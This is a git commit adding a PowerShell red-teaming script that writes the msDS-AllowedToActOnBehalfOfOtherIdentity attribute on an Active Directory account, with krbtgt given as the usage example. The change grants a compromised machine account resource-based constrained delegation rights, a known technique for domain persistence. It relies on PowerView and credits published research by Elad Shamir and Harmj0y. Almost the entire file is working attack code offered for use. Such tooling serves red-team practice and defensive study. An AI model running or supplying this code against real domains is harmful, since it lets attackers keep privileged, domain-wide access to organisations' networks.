added red-teaming/Set-PrincipalAllowedToDelegateToAccount.ps1

2025-11-04 13:05:26 +01:00 · 2019-08-22 15:12:12 +02:00
parent da3422d918
commit 0062483b8b
1 changed files with 49 additions and 0 deletions
--- a/red-teaming/Set-PrincipalAllowedToDelegateToAccount.ps1
+++ b/red-teaming/Set-PrincipalAllowedToDelegateToAccount.ps1
@@ -0,0 +1,49 @@
+#
+# Unconstrained Domain Persistence helper
+#
+# Usage:
+#   PS> . .\Set-PrincipalAllowedToDelegateToAccount.ps1
+#   PS> Set-PrincipalAllowedToDelegateToAccount -TargetUser krbtgt -TargetComputer COMPROMISED$
+#
+# Will allow for COMPROMISED$ machine account to perform S4U2 constrained delegation by the use
+# of Resource-Based Constrained Delegation flavour attack.
+#
+# Script for setting "msDS-AllowedToActOnBehalfOfOtherIdentity" property on the user's object, 
+# allowing incoming trust to the previously compromised Machine object, as described 
+# by Elad Shamir in his: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#unconstrained-domain-persistence
+#
+# This script requires PowerView to be loaded first.
+#
+# This is basically rewritten script from Harmj0y's blog post here:
+#   https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/
+# all credits goes to magnificent Harmj0y!
+#
+
+function Set-PrincipalAllowedToDelegateToAccount
+{
+    Param
+    (
+        [Parameter(Position = 0)]
+        [ValidateNotNullOrEmpty()]
+        [String]
+        $TargetUser,
+
+        [Parameter(Position = 1)]
+        [ValidateNotNullOrEmpty()]
+        [String]
+        $TargetComputer
+    )
+    
+    # translate the identity to a security identifier
+    $IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList $TargetComputer).Translate([System.Security.Principal.SecurityIdentifier])).Value
+
+    # Substitute the security identifier into the raw SDDL
+    $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($IdentitySID))"
+
+    # get the binary bytes for the SDDL
+    $SDBytes = New-Object byte[] ($SD.BinaryLength)
+    $SD.GetBinaryForm($SDBytes, 0)
+
+    # set new security descriptor for 'msds-allowedtoactonbehalfofotheridentity'
+    Get-DomainUser $TargetUser | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
+}